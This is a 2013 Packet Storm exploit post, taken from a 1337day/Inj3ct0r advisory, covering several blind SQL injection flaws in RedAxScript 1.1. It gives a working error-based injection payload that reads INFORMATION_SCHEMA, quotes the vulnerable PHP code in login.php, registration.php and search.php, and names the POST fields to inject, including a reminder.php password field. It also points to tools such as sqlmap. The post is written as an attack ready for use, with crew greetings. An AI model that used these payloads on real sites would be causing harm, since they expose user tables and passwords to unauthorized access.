exploit the possibilities

RedAxScript 1.1 SQL Injection

RedAxScript 1.1 SQL Injection
Posted Dec 6, 2013
Authored by KedAns-Dz

RedAxScript version 1.1 suffers from multiple remote blind SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
MD5 | aaae0b9a6888f430683b128cf50bbb25

RedAxScript 1.1 SQL Injection

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities

[>] Author : KedAns-Dz
[+] E-mail : ked-h (@hotmail.com / @1337day.com)
[+] FaCeb0ok : fb.me/Inj3ct0rK3d
[+] TwiTter : @kedans

[#] Platform : PHP / WebApp
[+] Cat/Tag : Multiple , SQL Injection , Blind SQLi

[<] <3 <3 Greetings t0 Palestine <3 <3

- Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ):
AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

- POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc..

#### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ##
****
$post_user = clean ($_POST['user'], 0);
$users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\'';
mysql_query $users_result = mysql_query($users_query);
****

[+] POST Data on > : user=[ SQL Injection Here ]

############################################################

#### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156)
****
$r['email'] = clean ($_POST['email'], 3);
$r['user'] = clean ($_POST['user'], 0);
$r['name'] = clean ($_POST['name'], 0);
****
mysql_query mysql_query($query);
$query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')';
$key_string .= ', '; // if($last != $key),
$key_string .= $key;
foreach($r as $key=>$value)
$value_string .= '\'' . $value . '\'';
****

[+] go to registration and POST Data on > : ( email, user, name ) =>
email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]--

############################################################

#### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ##
****
$search_terms = clean ($_POST['search_terms'], 1);
****
$query .= ')'; // if($search),
$query .= ' || '; // if($search), if($last != $key),
$query = 'SELECT id, title, alias, description, date, category, access FROM '...
foreach($search as $key=>$value) // if($search),
$search = array_filter(explode(' ', $search_terms));
****
mysql_query $result = mysql_query($query);
$query .= ' ORDER BY date DESC LIMIT 50';
****

[+] in Search area : POST Data on ( search_terms )
search_terms=[ SQL Injection Here ]

#### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p
lines : ( 57 , & 80.. 85 )
[+] POST Data on > : ( email=[ SQLi ] )

## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php )
but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it

####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####

# 1337day.com id:[1337day-2013-21617]

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close